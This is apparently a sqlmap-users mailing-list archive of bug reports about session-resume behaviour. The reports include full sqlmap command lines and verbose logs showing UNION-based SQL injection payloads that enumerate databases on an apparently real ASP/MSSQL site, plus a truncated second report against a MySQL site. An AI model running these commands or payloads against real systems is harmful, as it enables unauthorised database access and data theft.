# svn info Path: . URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap Repository Root: https://svn.sqlmap.org/sqlmap Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb Revision: 1497 Node Kind: directory Schedule: normal Last Changed Author: inquisb Last Changed Rev: 1497 Last Changed Date: 2010-03-18 14:36:58 -0300 (Thu, 18 Mar 2010) On Thu, Mar 18, 2010 at 11:22 PM, David Guimaraes <sk...@gm...> wrote: > When I try to run the sqlmap this way: > > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" > -p art --string WRAPED > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 22:53:24 > > [22:53:24] [DEBUG] initializing the configuration > [22:53:24] [DEBUG] initializing the knowledge base > [22:53:24] [DEBUG] cleaning up configuration parameters > [22:53:24] [DEBUG] setting the HTTP timeout > [22:53:24] [DEBUG] setting the HTTP method to GET > [22:53:24] [DEBUG] creating HTTP requests opener object > [22:53:24] [DEBUG] parsing XML queries file > [22:53:24] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [22:53:24] [INFO] testing connection to the target url > [22:53:25] [INFO] testing if the provided string is within the target > URL page content > [22:53:29] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 > parenthesis > [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art' > [22:53:29] [DEBUG] got HTTP error code: 500 > [22:53:30] [DEBUG] got HTTP error code: 500 > [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art' > [22:53:30] [DEBUG] got HTTP error code: 500 > [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable > with 0 parenthesis > [22:53:30] [INFO] testing for parenthesis on injectable parameter > [22:53:31] [DEBUG] got HTTP error code: 500 > [22:53:31] [DEBUG] got HTTP error code: 500 > [22:53:32] [DEBUG] got HTTP error code: 500 > [22:53:32] [INFO] the injectable parameter requires 0 parenthesis > [22:53:32] [INFO] testing MySQL > [22:53:32] [DEBUG] got HTTP error code: 500 > [22:53:32] [WARNING] the back-end DMBS is not MySQL > [22:53:32] [INFO] testing Oracle > [22:53:33] [DEBUG] got HTTP error code: 500 > [22:53:33] [WARNING] the back-end DMBS is not Oracle > [22:53:33] [INFO] testing PostgreSQL > [22:53:33] [DEBUG] got HTTP error code: 500 > [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL > [22:53:33] [INFO] testing Microsoft SQL Server > [22:53:34] [DEBUG] got HTTP error code: 500 > [22:53:34] [INFO] confirming Microsoft SQL Server > [22:53:35] [DEBUG] got HTTP error code: 500 > [22:53:35] [DEBUG] got HTTP error code: 500 > [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [22:53:35] [INFO] testing inband sql injection on parameter 'art' with > NULL bruteforcing technique > [22:53:39] [DEBUG] got HTTP error code: 500 > [22:53:39] [DEBUG] got HTTP error code: 500 > [22:53:40] [DEBUG] got HTTP error code: 500 > [22:53:40] [DEBUG] got HTTP error code: 500 > [22:53:44] [DEBUG] got HTTP error code: 500 > [22:53:44] [DEBUG] got HTTP error code: 500 > [22:53:44] [INFO] confirming full inband sql injection on parameter 'art' > [22:53:45] [DEBUG] got HTTP error code: 500 > [22:53:45] [DEBUG] got HTTP error code: 500 > [22:53:46] [DEBUG] got HTTP error code: 500 > [22:53:46] [DEBUG] got HTTP error code: 500 > [22:53:47] [DEBUG] got HTTP error code: 500 > [22:53:47] [DEBUG] got HTTP error code: 500 > [22:53:47] [WARNING] the target url is not affected by an exploitable > full inband sql injection vulnerability > [22:53:47] [INFO] confirming partial (single entry) inband sql > injection on parameter 'art' by appending a false condition after the > parameter value > [22:53:48] [DEBUG] got HTTP error code: 500 > [22:53:49] [DEBUG] got HTTP error code: 500 > [22:53:49] [DEBUG] got HTTP error code: 500 > [22:53:49] [INFO] the target url is affected by an exploitable partial > (single entry) inband sql injection vulnerability > valid union: > 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410' > > [22:53:49] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 22:53:49 > > > > > > > > > > > He notes correctly UNIONSQLi and ends OK. Soon after that, I try to > recover the database by including only the argument "--dbs" and he can > not recover in advance with the UNIONSQLi strange reason described > below and to the BLINDSQLi. He tries to find the right table name > without first knowing how many there really are through the use of the > UNIONSQLi and direct try to find out how many there are and their > names using the BLINDSQLi. > > Example with resume: > > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" > -p art --string WRAPED --dbs > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 22:54:40 > > [22:54:40] [DEBUG] initializing the configuration > [22:54:40] [DEBUG] initializing the knowledge base > [22:54:40] [DEBUG] cleaning up configuration parameters > [22:54:40] [DEBUG] setting the HTTP timeout > [22:54:40] [DEBUG] setting the HTTP method to GET > [22:54:40] [DEBUG] creating HTTP requests opener object > [22:54:40] [DEBUG] parsing XML queries file > [22:54:40] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [22:54:40] [INFO] resuming string match 'WRAPED' from session file > [22:54:40] [INFO] resuming injection point 'GET' from session file > [22:54:40] [INFO] resuming injection parameter 'art' from session file > [22:54:40] [INFO] resuming injection type 'numeric' from session file > [22:54:40] [INFO] resuming 0 number of parenthesis from session file > [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' > from session file > [22:54:40] [INFO] resuming union comment '--' from session file > [22:54:40] [INFO] resuming union count 6 from session file > [22:54:40] [INFO] resuming union position 2 from session file > [22:54:40] [INFO] testing connection to the target url > [22:54:43] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [22:54:43] [INFO] testing for parenthesis on injectable parameter > [22:54:43] [DEBUG] skipping test for MySQL > [22:54:43] [DEBUG] skipping test for Oracle > [22:54:43] [DEBUG] skipping test for PostgreSQL > [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [22:54:43] [INFO] fetching database names > [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), > NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796 > [22:54:44] [DEBUG] got HTTP error code: 500 > [22:54:45] [WARNING] for some reasons it was not possible to retrieve > the query output through inband SQL injection technique, sqlmap is > going blind > [22:54:45] [INFO] fetching number of databases > [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) > AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases > [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500 > [22:54:48] [DEBUG] got HTTP error code: 500 > . > . > . > [23:12:13] [DEBUG] performed 42 queries in 16 seconds > available databases [3]: > [*] mXX > [*] pXX > [*] tXX > > [23:12:13] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 23:12:13 > > > > > > > > > > > > But if I delete the session and send the sqlmap start over with the > "--dbs" activated, it correctly retrieves how many databases and their > names using the correct technique (UNIONSQLi). > > Example without resume (using --dbs first time): > # rm -rf output/* > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" > -p art --string WRAPED --dbs > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 23:16:02 > > [23:16:02] [DEBUG] initializing the configuration > [23:16:02] [DEBUG] initializing the knowledge base > [23:16:02] [DEBUG] cleaning up configuration parameters > [23:16:02] [DEBUG] setting the HTTP timeout > [23:16:02] [DEBUG] setting the HTTP method to GET > [23:16:02] [DEBUG] creating HTTP requests opener object > [23:16:02] [DEBUG] parsing XML queries file > [23:16:02] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [23:16:02] [INFO] testing connection to the target url > [23:16:02] [INFO] testing if the provided string is within the target > URL page content > [23:16:03] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 > parenthesis > [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art' > [23:16:04] [DEBUG] got HTTP error code: 500 > [23:16:04] [DEBUG] got HTTP error code: 500 > [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art' > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable > with 0 parenthesis > [23:16:05] [INFO] testing for parenthesis on injectable parameter > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:06] [DEBUG] got HTTP error code: 500 > [23:16:06] [INFO] the injectable parameter requires 0 parenthesis > [23:16:06] [INFO] testing MySQL > [23:16:06] [DEBUG] got HTTP error code: 500 > [23:16:06] [WARNING] the back-end DMBS is not MySQL > [23:16:06] [INFO] testing Oracle > [23:16:07] [DEBUG] got HTTP error code: 500 > [23:16:07] [WARNING] the back-end DMBS is not Oracle > [23:16:07] [INFO] testing PostgreSQL > [23:16:07] [DEBUG] got HTTP error code: 500 > [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL > [23:16:07] [INFO] testing Microsoft SQL Server > [23:16:08] [DEBUG] got HTTP error code: 500 > [23:16:08] [INFO] confirming Microsoft SQL Server > [23:16:14] [DEBUG] got HTTP error code: 500 > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [23:16:15] [INFO] testing inband sql injection on parameter 'art' with > NULL bruteforcing technique > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:17] [DEBUG] got HTTP error code: 500 > [23:16:17] [INFO] confirming full inband sql injection on parameter 'art' > [23:16:17] [DEBUG] got HTTP error code: 500 > [23:16:18] [DEBUG] got HTTP error code: 500 > [23:16:18] [DEBUG] got HTTP error code: 500 > [23:16:19] [DEBUG] got HTTP error code: 500 > [23:16:19] [DEBUG] got HTTP error code: 500 > [23:16:20] [DEBUG] got HTTP error code: 500 > [23:16:20] [WARNING] the target url is not affected by an exploitable > full inband sql injection vulnerability > [23:16:20] [INFO] confirming partial (single entry) inband sql > injection on parameter 'art' by appending a false condition after the > parameter value > [23:16:21] [DEBUG] got HTTP error code: 500 > [23:16:22] [DEBUG] got HTTP error code: 500 > [23:16:27] [DEBUG] got HTTP error code: 500 > [23:16:27] [INFO] the target url is affected by an exploitable partial > (single entry) inband sql injection vulnerability > valid union: > 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716' > > [23:16:27] [INFO] fetching database names > [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578 > [23:16:28] [DEBUG] got HTTP error code: 500 > [23:16:28] [DEBUG] performed 1 queries in 0 seconds > [23:16:28] [INFO] the SQL query provided returns 3 entries > [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 0 name FROM master..sysdatabases)-- AND 7328=7328 > [23:16:31] [DEBUG] got HTTP error code: 500 > [23:16:31] [DEBUG] performed 2 queries in 3 seconds > [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 1 name FROM master..sysdatabases)-- AND 1346=1346 > [23:16:32] [DEBUG] got HTTP error code: 500 > [23:16:32] [DEBUG] performed 3 queries in 0 seconds > [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 2 name FROM master..sysdatabases)-- AND 231=231 > [23:16:33] [DEBUG] got HTTP error code: 500 > [23:16:33] [DEBUG] performed 4 queries in 1 seconds > available databases [3]: > [*] mXX > [*] pXX > [*] tXX > > [23:16:33] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 23:16:33 > > > > > > > > > > > > The same thing happens if I send sqlmap to dump the tables (--tables). > If I do not pass --tables the first time it runs and discovers the > vulnerability, when it runs again with the resumed file, it just go > right for BLINDSQLi, taking much longer to complete the task! > > > > -- > David Gomes Guimarães > -- David Gomes Guimarães |
From: David G. <sk...@gm...> - 2010-03-19 02:22:55
|
When I try to run the sqlmap this way: # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" -p art --string WRAPED sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 22:53:24 [22:53:24] [DEBUG] initializing the configuration [22:53:24] [DEBUG] initializing the knowledge base [22:53:24] [DEBUG] cleaning up configuration parameters [22:53:24] [DEBUG] setting the HTTP timeout [22:53:24] [DEBUG] setting the HTTP method to GET [22:53:24] [DEBUG] creating HTTP requests opener object [22:53:24] [DEBUG] parsing XML queries file [22:53:24] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file [22:53:24] [INFO] testing connection to the target url [22:53:25] [INFO] testing if the provided string is within the target URL page content [22:53:29] [WARNING] the testable parameter 'art' you provided is not into the Cookie [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 parenthesis [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art' [22:53:29] [DEBUG] got HTTP error code: 500 [22:53:30] [DEBUG] got HTTP error code: 500 [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art' [22:53:30] [DEBUG] got HTTP error code: 500 [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable with 0 parenthesis [22:53:30] [INFO] testing for parenthesis on injectable parameter [22:53:31] [DEBUG] got HTTP error code: 500 [22:53:31] [DEBUG] got HTTP error code: 500 [22:53:32] [DEBUG] got HTTP error code: 500 [22:53:32] [INFO] the injectable parameter requires 0 parenthesis [22:53:32] [INFO] testing MySQL [22:53:32] [DEBUG] got HTTP error code: 500 [22:53:32] [WARNING] the back-end DMBS is not MySQL [22:53:32] [INFO] testing Oracle [22:53:33] [DEBUG] got HTTP error code: 500 [22:53:33] [WARNING] the back-end DMBS is not Oracle [22:53:33] [INFO] testing PostgreSQL [22:53:33] [DEBUG] got HTTP error code: 500 [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL [22:53:33] [INFO] testing Microsoft SQL Server [22:53:34] [DEBUG] got HTTP error code: 500 [22:53:34] [INFO] confirming Microsoft SQL Server [22:53:35] [DEBUG] got HTTP error code: 500 [22:53:35] [DEBUG] got HTTP error code: 500 [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2000 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005 [22:53:35] [INFO] testing inband sql injection on parameter 'art' with NULL bruteforcing technique [22:53:39] [DEBUG] got HTTP error code: 500 [22:53:39] [DEBUG] got HTTP error code: 500 [22:53:40] [DEBUG] got HTTP error code: 500 [22:53:40] [DEBUG] got HTTP error code: 500 [22:53:44] [DEBUG] got HTTP error code: 500 [22:53:44] [DEBUG] got HTTP error code: 500 [22:53:44] [INFO] confirming full inband sql injection on parameter 'art' [22:53:45] [DEBUG] got HTTP error code: 500 [22:53:45] [DEBUG] got HTTP error code: 500 [22:53:46] [DEBUG] got HTTP error code: 500 [22:53:46] [DEBUG] got HTTP error code: 500 [22:53:47] [DEBUG] got HTTP error code: 500 [22:53:47] [DEBUG] got HTTP error code: 500 [22:53:47] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability [22:53:47] [INFO] confirming partial (single entry) inband sql injection on parameter 'art' by appending a false condition after the parameter value [22:53:48] [DEBUG] got HTTP error code: 500 [22:53:49] [DEBUG] got HTTP error code: 500 [22:53:49] [DEBUG] got HTTP error code: 500 [22:53:49] [INFO] the target url is affected by an exploitable partial (single entry) inband sql injection vulnerability valid union: 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410' [22:53:49] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com' [*] shutting down at: 22:53:49 He notes correctly UNIONSQLi and ends OK. Soon after that, I try to recover the database by including only the argument "--dbs" and he can not recover in advance with the UNIONSQLi strange reason described below and to the BLINDSQLi. He tries to find the right table name without first knowing how many there really are through the use of the UNIONSQLi and direct try to find out how many there are and their names using the BLINDSQLi. Example with resume: # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" -p art --string WRAPED --dbs sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 22:54:40 [22:54:40] [DEBUG] initializing the configuration [22:54:40] [DEBUG] initializing the knowledge base [22:54:40] [DEBUG] cleaning up configuration parameters [22:54:40] [DEBUG] setting the HTTP timeout [22:54:40] [DEBUG] setting the HTTP method to GET [22:54:40] [DEBUG] creating HTTP requests opener object [22:54:40] [DEBUG] parsing XML queries file [22:54:40] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file [22:54:40] [INFO] resuming string match 'WRAPED' from session file [22:54:40] [INFO] resuming injection point 'GET' from session file [22:54:40] [INFO] resuming injection parameter 'art' from session file [22:54:40] [INFO] resuming injection type 'numeric' from session file [22:54:40] [INFO] resuming 0 number of parenthesis from session file [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file [22:54:40] [INFO] resuming union comment '--' from session file [22:54:40] [INFO] resuming union count 6 from session file [22:54:40] [INFO] resuming union position 2 from session file [22:54:40] [INFO] testing connection to the target url [22:54:43] [WARNING] the testable parameter 'art' you provided is not into the Cookie [22:54:43] [INFO] testing for parenthesis on injectable parameter [22:54:43] [DEBUG] skipping test for MySQL [22:54:43] [DEBUG] skipping test for Oracle [22:54:43] [DEBUG] skipping test for PostgreSQL [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2000 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005 [22:54:43] [INFO] fetching database names [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796 [22:54:44] [DEBUG] got HTTP error code: 500 [22:54:45] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind [22:54:45] [INFO] fetching number of databases [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500 [22:54:48] [DEBUG] got HTTP error code: 500 . . . [23:12:13] [DEBUG] performed 42 queries in 16 seconds available databases [3]: [*] mXX [*] pXX [*] tXX [23:12:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com' [*] shutting down at: 23:12:13 But if I delete the session and send the sqlmap start over with the "--dbs" activated, it correctly retrieves how many databases and their names using the correct technique (UNIONSQLi). Example without resume (using --dbs first time): # rm -rf output/* # ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" -p art --string WRAPED --dbs sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 23:16:02 [23:16:02] [DEBUG] initializing the configuration [23:16:02] [DEBUG] initializing the knowledge base [23:16:02] [DEBUG] cleaning up configuration parameters [23:16:02] [DEBUG] setting the HTTP timeout [23:16:02] [DEBUG] setting the HTTP method to GET [23:16:02] [DEBUG] creating HTTP requests opener object [23:16:02] [DEBUG] parsing XML queries file [23:16:02] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file [23:16:02] [INFO] testing connection to the target url [23:16:02] [INFO] testing if the provided string is within the target URL page content [23:16:03] [WARNING] the testable parameter 'art' you provided is not into the Cookie [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 parenthesis [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art' [23:16:04] [DEBUG] got HTTP error code: 500 [23:16:04] [DEBUG] got HTTP error code: 500 [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art' [23:16:05] [DEBUG] got HTTP error code: 500 [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable with 0 parenthesis [23:16:05] [INFO] testing for parenthesis on injectable parameter [23:16:05] [DEBUG] got HTTP error code: 500 [23:16:05] [DEBUG] got HTTP error code: 500 [23:16:06] [DEBUG] got HTTP error code: 500 [23:16:06] [INFO] the injectable parameter requires 0 parenthesis [23:16:06] [INFO] testing MySQL [23:16:06] [DEBUG] got HTTP error code: 500 [23:16:06] [WARNING] the back-end DMBS is not MySQL [23:16:06] [INFO] testing Oracle [23:16:07] [DEBUG] got HTTP error code: 500 [23:16:07] [WARNING] the back-end DMBS is not Oracle [23:16:07] [INFO] testing PostgreSQL [23:16:07] [DEBUG] got HTTP error code: 500 [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL [23:16:07] [INFO] testing Microsoft SQL Server [23:16:08] [DEBUG] got HTTP error code: 500 [23:16:08] [INFO] confirming Microsoft SQL Server [23:16:14] [DEBUG] got HTTP error code: 500 [23:16:15] [DEBUG] got HTTP error code: 500 [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2000 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005 [23:16:15] [INFO] testing inband sql injection on parameter 'art' with NULL bruteforcing technique [23:16:15] [DEBUG] got HTTP error code: 500 [23:16:15] [DEBUG] got HTTP error code: 500 [23:16:16] [DEBUG] got HTTP error code: 500 [23:16:16] [DEBUG] got HTTP error code: 500 [23:16:16] [DEBUG] got HTTP error code: 500 [23:16:17] [DEBUG] got HTTP error code: 500 [23:16:17] [INFO] confirming full inband sql injection on parameter 'art' [23:16:17] [DEBUG] got HTTP error code: 500 [23:16:18] [DEBUG] got HTTP error code: 500 [23:16:18] [DEBUG] got HTTP error code: 500 [23:16:19] [DEBUG] got HTTP error code: 500 [23:16:19] [DEBUG] got HTTP error code: 500 [23:16:20] [DEBUG] got HTTP error code: 500 [23:16:20] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability [23:16:20] [INFO] confirming partial (single entry) inband sql injection on parameter 'art' by appending a false condition after the parameter value [23:16:21] [DEBUG] got HTTP error code: 500 [23:16:22] [DEBUG] got HTTP error code: 500 [23:16:27] [DEBUG] got HTTP error code: 500 [23:16:27] [INFO] the target url is affected by an exploitable partial (single entry) inband sql injection vulnerability valid union: 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716' [23:16:27] [INFO] fetching database names [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578 [23:16:28] [DEBUG] got HTTP error code: 500 [23:16:28] [DEBUG] performed 1 queries in 0 seconds [23:16:28] [INFO] the SQL query provided returns 3 entries [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases)-- AND 7328=7328 [23:16:31] [DEBUG] got HTTP error code: 500 [23:16:31] [DEBUG] performed 2 queries in 3 seconds [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM master..sysdatabases)-- AND 1346=1346 [23:16:32] [DEBUG] got HTTP error code: 500 [23:16:32] [DEBUG] performed 3 queries in 0 seconds [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM master..sysdatabases)-- AND 231=231 [23:16:33] [DEBUG] got HTTP error code: 500 [23:16:33] [DEBUG] performed 4 queries in 1 seconds available databases [3]: [*] mXX [*] pXX [*] tXX [23:16:33] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com' [*] shutting down at: 23:16:33 The same thing happens if I send sqlmap to dump the tables (--tables). If I do not pass --tables the first time it runs and discovers the vulnerability, when it runs again with the resumed file, it just go right for BLINDSQLi, taking much longer to complete the task! -- David Gomes Guimarães |
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-18 09:46:25
|
Brandon, I can't reproduce it, it works just fine for me. Can you please provide us with the full output with -v 5 please? Also, try with --threads and without from the latest version on subversion repository. Regards, Bernardo On Wed, Mar 17, 2010 at 18:47, Brandon <bmu...@gm...> wrote: > Well there is a bug when retrieving the databases. When retrieving the > databases it tends to retrieve the wrong characters. This bug also is when > retrieving the mysql passwords. The program has spaces in some of the hashes > as well as "@" in 1 of the passwords. I am on windows xp pro SP3. Here is an > example of retrieving one of the wrong characters in the DB name. Mind you > .7 worked without any issues grabbing DB's and grabbing mysql passwords. > > C:\sqlmap8>sqlmap -u vulnsite.com/sites.php?site_id=130 --dbs > > sqlmap/0.8 - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 13:31:01 > > [13:31:01] [INFO] using 'C:\sqlmap8\output\vulnsite.com\session' as sessi > on file > [13:31:01] [INFO] resuming match ratio '0.968' from session file > [13:31:01] [INFO] resuming injection point 'GET' from session file > [13:31:01] [INFO] resuming injection parameter 'site_id' from session file > [13:31:01] [INFO] resuming injection type 'numeric' from session file > [13:31:01] [INFO] resuming 0 number of parenthesis from session file > [13:31:01] [INFO] resuming back-end DBMS 'mysql 5' from session file > [13:31:01] [INFO] testing connection to the target url > [13:31:05] [INFO] testing for parenthesis on injectable 